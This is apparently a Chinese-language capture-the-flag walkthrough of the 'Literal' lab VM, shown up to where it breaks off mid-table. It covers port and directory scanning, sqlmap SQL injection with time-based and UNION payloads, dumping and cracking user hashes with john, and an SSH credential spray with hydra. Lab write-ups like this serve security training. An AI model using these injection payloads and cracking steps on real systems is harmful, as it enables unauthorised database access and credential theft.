文章

Literal

Literal

image-20250608233900599

image-20250608231514781

信息搜集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/temp/literal]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.10.107:22
Open 192.168.10.107:80

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 30:ca:55:94:68:33:8b:50:42:f4:c2:b5:13:99:66:fe (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHo8DOQOkmGeRiMEbdmfaE+IyUTZlYHdLzXeFISi7bsWEPHm2f3Lx9RpCBM4g05tmpBBe4sPyruVbuslcGcCmlUzBYupaHJQRVi79Dezh9CKf4Ui1EC6y4jh9TbvHPvM7hPhSBhADnCuEpWlVHeyUs4Wwzt6149l4ZFYXnl1/jfG/LA/PNRX26fhZUEJJXuvhwJIbchRxXhF00mREtmx5hbyDAXOIImUReCSjEhUAR3I4eljBgNEf/SoBvntnricNXGb8y2M1WoidBz3lLRRPhpQy0GE2BVs/05EirzRAIVWhLj7OiKIoLRd/tKq/CvSy5AYPyaC55cwktS60KIMzUBldGK65btKjNabs9rgNE/azTmpmEiWuHZKCdW4IhA00hXywbr6lWuSNmEaPnQqBLT0VUKFHEyhApBmvcT5GjHS34lG88xGAy7V1TVW8JKPHDq1ttnnJknRn9C9BmgylrwyL7m8UjCn49unSIbIFtkaSshPhpZfLzxxXKS6xrBes=
|   256 2d:b0:5e:6b:96:bd:0b:e3:14:fb:e0:d0:58:84:50:85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNvQ4n2nkgCsY7Z8qPbOt54NyXbow2ioVHPFXTn6XuwDOJpc5Q0FhEmSTVC4o4l9G+FMDzkJ2JgghkHvNstXiXU=
|   256 92:d9:2a:5d:6f:58:db:85:56:d6:0c:99:68:b8:59:64 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKUnTxK9t2cdkLjqE75NTSfr7qidWHqt0/uV3i0UALED
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://blog.literal.hmv
MAC Address: 08:00:27:4C:64:E1 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: blog.literal.hmv; OS: Linux; CPE: cpe:/o:linux:linux_kernel

得到了一个域名解析,添加到/etc/hosts

1
192.168.10.107   blog.literal.hmv

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/temp/literal]
└─$ gobuster dir -u http://blog.literal.hmv/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip -e 200,302,301 -t 20      
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://blog.literal.hmv/
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,zip,php
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://blog.literal.hmv/.html                (Status: 403) [Size: 281]
http://blog.literal.hmv/.php                 (Status: 403) [Size: 281]
http://blog.literal.hmv/images               (Status: 301) [Size: 321] [--> http://blog.literal.hmv/images/]
http://blog.literal.hmv/index.html           (Status: 200) [Size: 3325]
http://blog.literal.hmv/login.php            (Status: 200) [Size: 1893]
http://blog.literal.hmv/register.php         (Status: 200) [Size: 2159]
http://blog.literal.hmv/logout.php           (Status: 302) [Size: 0] [--> login.php]
http://blog.literal.hmv/config.php           (Status: 200) [Size: 0]
http://blog.literal.hmv/fonts                (Status: 301) [Size: 320] [--> http://blog.literal.hmv/fonts/]
http://blog.literal.hmv/dashboard.php        (Status: 302) [Size: 0] [--> login.php]
http://blog.literal.hmv/.html                (Status: 403) [Size: 281]
http://blog.literal.hmv/.php                 (Status: 403) [Size: 281]
http://blog.literal.hmv/server-status        (Status: 403) [Size: 281]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

漏洞发现

踩点

image-20250608232520132

尝试login.php以及register.php

image-20250608232720029

image-20250608232752352

尝试创建一个用户并进行登录:

image-20250608234004774

登录以后:

image-20250608234510023

image-20250608235037910

sql注入

看起来是一个数据库,尝试是否存在SQL注入,不知道为啥访问速递极慢且卡顿,尝试命令行进行查询:

1
PHPSESSID=1q4tie68cpa1mue9af2ao65549

image-20250608235600409

尝试进行sqlmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://blog.literal.hmv/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.2#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:04:49 /2025-06-08/

[12:04:49] [INFO] resuming back-end DBMS 'mysql' 
[12:04:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: sentence-query (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sentence-query=1' AND (SELECT 3428 FROM (SELECT(SLEEP(5)))hFKD) AND 'mdnY'='mdnY

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: sentence-query=1' UNION ALL SELECT NULL,CONCAT(0x717a6b7871,0x4b756f5a616d456b4c76596f48446652644149766b6d64745666776148746858744863505247566e,0x716b626a71),NULL,NULL,NULL-- -
---
[12:04:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[12:04:49] [INFO] fetching database names
available databases [4]:
[*] blog
[*] information_schema
[*] mysql
[*] performance_schema

[12:04:50] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/blog.literal.hmv'

┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://blog.literal.hmv/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch -D blog --tables
-----
Database: blog
[2 tables]
+----------+
| projects |
| users    |
+----------+

┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://blog.literal.hmv/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch -D blog -T users --dump

Database: blog
Table: users
[18 entries]
+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+
| userid | username  | useremail                        | userpassword                                                 | usercreatedate      |
+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+
| 1      | test      | test@blog.literal.htb            | $2y$10$wWhvCz1pGsKm..jh/lChIOA7aJoZRAil40YKlGFiw6B.6a77WzNma | 2023-04-07 17:21:47 |
| 2      | admin     | admin@blog.literal.htb           | $2y$10$fjNev2yv9Bi1IQWA6VOf9Owled5hExgUZNoj8gSmc7IdZjzuOWQ8K | 2023-04-07 17:21:47 |
| 3      | carlos    | carlos@blog.literal.htb          | $2y$10$ikI1dN/A1lhkKLmiKl.cJOkLiSgPUPiaRoopeqvD/.p.bh0w.bJBW | 2023-04-07 17:21:48 |
| 4      | freddy123 | freddy123@zeeli.moc              | $2y$10$yaf9nZ6UJkf8103R8rMdtOUC.vyZUek4vXVPas3CPOb4EK8I6eAUK | 2023-04-07 17:21:48 |
| 5      | jorg3_M   | jorg3_M@zeeli.moc                | $2y$10$lZ./Zflz1EEFdYbWp7VUK.415Ni8q9kYk3LJ2nF0soRJG1RymtDzG | 2023-04-07 17:21:48 |
| 6      | aNdr3s1to | aNdr3s1to@puertonacional.ply     | $2y$10$F2Eh43xkXR/b0KaGFY5MsOwlnh4fuEZX3WNhT3PxSw.6bi/OBA6hm | 2023-04-07 17:21:48 |
| 7      | kitty     | kitty@estadodelarte.moc          | $2y$10$rXliRlBckobgE8mJTZ7oXOaZr4S2NSwqinbUGLcOfCWDra6v9bxcW | 2023-04-07 17:21:48 |
| 8      | walter    | walter@forumtesting.literal.hmv  | $2y$10$er9GaSRv1AwIwu9O.tlnnePNXnzDfP7LQMAUjW2Ca1td3p0Eve6TO | 2023-04-07 17:21:48 |
| 9      | estefy    | estefy@caselogic.moc             | $2y$10$hBB7HeTJYBAtdFn7Q4xzL.WT3EBMMZcuTJEAvUZrRe.9szCp19ZSa | 2023-04-07 17:21:48 |
| 10     | michael   | michael@without.you              | $2y$10$sCbKEWGgAUY6a2Y.DJp8qOIa250r4ia55RMrDqHoRYU3Y7pL2l8Km | 2023-04-07 17:21:48 |
| 11     | r1ch4rd   | r1ch4rd@forumtesting.literal.hmv | $2y$10$7itXOzOkjrAKk7Mp.5VN5.acKwGi1ziiGv8gzQEK7FOFLomxV0pkO | 2023-04-07 17:21:48 |
| 12     | fel1x     | fel1x@without.you                | $2y$10$o06afYsuN8yk0yoA.SwMzucLEavlbI8Rl43.S0tbxL.VVSbsCEI0m | 2023-04-07 17:21:48 |
| 13     | kelsey    | kelsey@without.you               | $2y$10$vxN98QmK39rwvVbfubgCWO9W2alVPH4Dp4Bk7DDMWRvfN995V4V6. | 2023-04-07 17:21:48 |
| 14     | jtx       | jtx@tiempoaltiempo.hy            | $2y$10$jN5dt8syJ5cVrlpotOXibeNC/jvW0bn3z6FetbVU/CeFtKwhdhslC | 2023-04-07 17:21:48 |
| 15     | DRphil    | DRphil@alcaldia-tol.gob          | $2y$10$rW58MSsVEaRqr8uIbUeEeuDrYB6nmg7fqGz90rHYHYMt2Qyflm1OC | 2023-04-07 17:21:48 |
| 16     | carm3N    | carm3N@estadodelarte.moc         | $2y$10$D7uF6dKbRfv8U/M/mUj0KujeFxtbj6mHCWT5SaMcug45u7lo/.RnW | 2023-04-07 17:21:48 |
| 17     | lanz      | lanz@literal.htb                 | $2y$10$PLGN5.jq70u3j5fKpR8R6.Zb70So/8IWLi4e69QqJrM8FZvAMf..e | 2023-04-07 17:55:36 |
| 18     | kali      | kali@kali.com                    | $2y$10$zzhgE4mDcdEGhDR6VGwK9.qpCDLnDkFmVB6cSDo.bPNjKdUV.Hw1. | 2025-06-08 15:40:11 |
+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+

image-20250609000812789

这里准备破译,直接丢给ai让他分离再给我们就行了。。。。(高端的厨师往往采用最朴素的烹饪方式)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
test:$2y$10$wWhvCz1pGsKm..jh/lChIOA7aJoZRAil40YKlGFiw6B.6a77WzNma
admin:$2y$10$fjNev2yv9Bi1IQWA6VOf9Owled5hExgUZNoj8gSmc7IdZjzuOWQ8K
carols:$2y$10$ikI1dN/A1lhkKLmiKl.cJOkLiSgPUPiaRoopeqvD/.p.bh0w.bJBW
freddy123:$2y$10$yaf9nZ6UJkf8103R8rMdtOUC.vyZUek4vXVPas3CPOb4EK8I6eAUK
jorg3_M:$2y$10$lZ./Zflz1EEFdYbWp7VUK.415Ni8q9kYk3LJ2nF0soRJG1RymtDzG
aNdr3s1to:$2y$10$F2Eh43xkXR/b0KaGFY5MsOwlnh4fuEZX3WNhT3PxSw.6bi/OBA6hm
kitty:$2y$10$rXliRlBckobgE8mJTZ7oXOaZr4S2NSwqinbUGLcOfCWDra6v9bxcW
walter:$2y$10$er9GaSRv1AwIwu9O.tlnnePNXnzDfP7LQMAUjW2Ca1td3p0Eve6TO
estefy:$2y$10$hBB7HeTJYBAtdFn7Q4xzL.WT3EBMMZcuTJEAvUZrRe.9szCp19ZSa
michael:$2y$10$sCbKEWGgAUY6a2Y.DJp8qOIa250r4ia55RMrDqHoRYU3Y7pL2l8Km
r1ch4rd:$2y$10$7itXOzOkjrAKk7Mp.5VN5.acKwGi1ziiGv8gzQEK7FOFLomxV0pkO
fel1x:$2y$10$o06afYsuN8yk0yoA.SwMzucLEavlbI8Rl43.S0tbxL.VVSbsCEI0m
kelsey:$2y$10$vxN98QmK39rwvVbfubgCWO9W2alVPH4Dp4Bk7DDMWRvfN995V4V6.
jtx:$2y$10$jN5dt8syJ5cVrlpotOXibeNC/jvW0bn3z6FetbVU/CeFtKwhdhslC
DRphil:$2y$10$rW58MSsVEaRqr8uIbUeEeuDrYB6nmg7fqGz90rHYHYMt2Qyflm1OC
carm3N:$2y$10$D7uF6dKbRfv8U/M/mUj0KujeFxtbj6mHCWT5SaMcug45u7lo/.RnW
lanz:$2y$10$PLGN5.jq70u3j5fKpR8R6.Zb70So/8IWLi4e69QqJrM8FZvAMf..e
kali:$2y$10$zzhgE4mDcdEGhDR6VGwK9.qpCDLnDkFmVB6cSDo.bPNjKdUV.Hw1.

尝试进行破译:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/temp/literal]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 18 password hashes with 18 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456789        (freddy123)     
butterfly        (estefy)     
monica           (r1ch4rd)     
hellokitty       (kitty)     
50cent           (DRphil)     
slipknot         (jorg3_M)     
michael1         (michael)     
147258369        (fel1x)     
kelsey           (kelsey)     
741852963        (walter)
zxcvbnm,./       (jtx)  

记录一下密码,并尝试进行ssh连接。这里用 AI 编写了一个脚本尝试进行核对:

1
2
3
4
5
6
7
8
9
10
11
12
# user
freddy123
estefy
r1ch4rd
kitty
DRphil
jorg3_M
michael
fel1x
kelsey
walter
jtx
1
2
3
4
5
6
7
8
9
10
11
12
# pass
123456789
butterfly
monica
hellokitty
50cent
slipknot
michael1
147258369
kelsey
741852963
zxcvbnm,./

尝试爆破但是失败了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali㉿kali)-[~/temp/literal]
└─$ paste -d: user pass > cred

┌──(kali㉿kali)-[~/temp/literal]
└─$ hydra -C cred ssh://192.168.10.107:22 -t 4 -vV -f 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-08 12:42:58
[DATA] max 4 tasks per 1 server, overall 4 tasks, 11 login tries, ~3 tries per task
[DATA] attacking ssh://192.168.10.107:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://freddy123@192.168.10.107:22
[INFO] Successful, password authentication is supported by ssh://192.168.10.107:22
[ATTEMPT] target 192.168.10.107 - login "freddy123" - pass "123456789" - 1 of 11 [child 0] (0/0)
[ATTEMPT] target 192.168.10.107 - login "estefy" - pass "butterfly" - 2 of 11 [child 1] (0/0)
[ATTEMPT] target 192.168.10.107 - login "r1ch4rd" - pass "monica" - 3 of 11 [child 2] (0/0)
[ATTEMPT] target 192.168.10.107 - login "kitty" - pass "hellokitty" - 4 of 11 [child 3] (0/0)
[ATTEMPT] target 192.168.10.107 - login "DRphil" - pass "50cent" - 5 of 11 [child 0] (0/0)
[ATTEMPT] target 192.168.10.107 - login "jorg3_M" - pass "slipknot" - 6 of 11 [child 1] (0/0)
[ATTEMPT] target 192.168.10.107 - login "michael" - pass "michael1" - 7 of 11 [child 3] (0/0)
[ATTEMPT] target 192.168.10.107 - login "fel1x" - pass "147258369" - 8 of 11 [child 2] (0/0)
[ATTEMPT] target 192.168.10.107 - login "kelsey" - pass "kelsey" - 9 of 11 [child 3] (0/0)
[ATTEMPT] target 192.168.10.107 - login "walter" - pass "741852963" - 10 of 11 [child 1] (0/0)
[ATTEMPT] target 192.168.10.107 - login "jtx" - pass "zxcvbnm,./" - 11 of 11 [child 0] (0/0)
[STATUS] attack finished for 192.168.10.107 (waiting for children to complete tests)
1 of 1 target completed, 0 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-08 12:43:07

新注入点

注意到前面的邮箱中出现了一个新的dns解析,尝试进行利用:

1
192.168.10.107   forumtesting.literal.hmv

尝试访问,发现会自动进行跳转:

1
http://forumtesting.literal.hmv/category.php

反馈太慢,总是卡死,尝试终端进行测试吧:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
┌──(kali㉿kali)-[~/temp/literal]
└─$ curl http://forumtesting.literal.hmv/category.php
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap-theme.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<!-- jQuery -->
<title>c4TLoUis forum</title> 
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="css/style.css">
</head>
<body class="">
<div class="container" style="min-height:500px;">
        <div class="container">
        <div class="row">
                <h2>Discussion Forum | About... Imagination</h2>
                <h3><a href="category.php">Home</a> | <a href="login.php">Login</a> | <a href="cp_login.php">Control Panel</a></h3>


                                        <div class="single category">
                                <ul class="list-unstyled">
                                        <li><span style="font-size:25px;font-weight:bold;">Categories</span> <span class="pull-right"><span style="font-size:20px;font-weight:bold;">Topics / Posts</span></span></li>
                                                                                        <li><a href="category.php?category_id=2" title="">Forum details <span class="pull-right">0 / 0</span></a></li>
                                                                                        <li><a href="category.php?category_id=1" title="">New things for the blog <span class="pull-right">0 / 0</span></a></li>
                                                                        </ul>
                   </div>
                </div>
</div>
<div class="insert-post-ads1" style="margin-top:20px;">

</body>
</html>

┌──(kali㉿kali)-[~/temp/literal]
└─$ curl http://forumtesting.literal.hmv/category.php | html2text
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1816  100  1816    0     0  24319      0 --:--:-- --:--:-- --:--:-- 24540
***** Discussion Forum | About... Imagination *****
**** Home | Login | Control Panel ****
    * Categories Topics / Posts
    * Forum details 0 / 0
    * New things for the blog 0 / 0

┌──(kali㉿kali)-[~/temp/literal]
└─$ curl -s http://forumtesting.literal.hmv/category.php | html2text
***** Discussion Forum | About... Imagination *****
**** Home | Login | Control Panel ****
    * Categories Topics / Posts
    * Forum details 0 / 0
    * New things for the blog 0 / 0

发现出现了可能存在sql注入的点:category.php?category_id=2,进行sqlmap测试:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=2" --batch --dbs              
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.2#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:55:58 /2025-06-08/

[12:55:58] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=82oqekh0oed...3bdp26e439'). Do you want to use those [Y/n] Y
[12:55:58] [INFO] testing if the target URL content is stable
[12:55:58] [INFO] target URL content is stable
[12:55:58] [INFO] testing if GET parameter 'category_id' is dynamic
[12:55:58] [INFO] GET parameter 'category_id' appears to be dynamic
[12:55:58] [WARNING] heuristic (basic) test shows that GET parameter 'category_id' might not be injectable
[12:55:58] [INFO] testing for SQL injection on GET parameter 'category_id'
[12:55:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:55:59] [WARNING] reflective value(s) found and filtering out
[12:55:59] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:55:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:55:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:55:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:55:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:55:59] [INFO] testing 'Generic inline queries'
[12:55:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:55:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:55:59] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:55:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:56:19] [INFO] GET parameter 'category_id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:56:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:56:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:56:19] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:56:19] [INFO] target URL appears to have 1 column in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
[12:56:19] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') 
[12:56:19] [INFO] target URL appears to be UNION injectable with 1 columns
[12:56:19] [INFO] checking if the injection point on GET parameter 'category_id' is a false positive
GET parameter 'category_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:
---
Parameter: category_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category_id=2 AND (SELECT 9058 FROM (SELECT(SLEEP(5)))OMno)
---
[12:56:59] [INFO] the back-end DBMS is MySQL
[12:56:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41, PHP
back-end DBMS: MySQL >= 5.0.12
[12:57:00] [INFO] fetching database names
[12:57:00] [INFO] fetching number of databases
[12:57:00] [INFO] retrieved: 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[12:57:30] [INFO] adjusting time delay to 1 second due to good response times
3
[12:57:30] [INFO] retrieved: in^C
[12:57:45] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 72 times

发现存在延时注入漏洞,看来这个靶机是训练sql注入的,可惜了,回头补回来吧。。。太慢了,经过漫长的测试拿到了一个凭证:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
# sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=2" --batch --dbs
# information_schema
# performance_schema
# forumtesting

# sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=2" --batch -D forumtesting --tables
# forum_category
# forum_owner
# forum_posts
# forum_topics
# forum_users

┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=2" --batch -D forumtesting -T forum_owner --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.2#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:24:22 /2025-06-08/

[13:24:22] [INFO] resuming back-end DBMS 'mysql' 
[13:24:22] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=cldac0c27tr...9f43f8ihi7'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: category_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category_id=2 AND (SELECT 9058 FROM (SELECT(SLEEP(5)))OMno)
---
[13:24:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41, PHP
back-end DBMS: MySQL >= 5.0.12
[13:24:22] [INFO] fetching columns for table 'forum_owner' in database 'forumtesting'
[13:24:22] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                                              
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[13:24:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
5
[13:24:43] [INFO] retrieved: 
[13:24:53] [INFO] adjusting time delay to 1 second due to good response times
created
[13:25:27] [INFO] retrieved: email
[13:25:53] [INFO] retrieved: id
[13:26:06] [INFO] retrieved: password
[13:27:00] [INFO] retrieved: username
[13:27:45] [INFO] fetching entries for table 'forum_owner' in database 'forumtesting'
[13:27:45] [INFO] fetching number of entries for table 'forum_owner' in database 'forumtesting'
[13:27:45] [INFO] retrieved: 1
[13:27:47] [WARNING] reflective value(s) found and filtering out of statistical model, please wait                                                                                          
.............................. (done)
2022-02-12
[13:28:46] [INFO] retrieved: carlos@forumtesting.literal.htb
[13:32:11] [INFO] retrieved: 1
[13:32:16] [INFO] retrieved: 6705fe62010679f04257358241792b41acba4ea896178a40eb63c743f5317a09faefa2e056486d55e9c05f851b222e6e7c5c1bd22af135157aa9b02201cf4e99
[13:46:13] [INFO] retrieved: carlos
[13:46:49] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[13:46:49] [INFO] using hash method 'sha512_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[13:46:49] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[13:46:49] [INFO] starting dictionary-based cracking (sha512_generic_passwd)
[13:46:49] [INFO] starting 2 processes 
[13:47:11] [WARNING] no clear password(s) found                                                                                                                                             
Database: forumtesting
Table: forum_owner
[1 entry]
+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+
| id | email                           | created    | password                                                                                                                         | username |
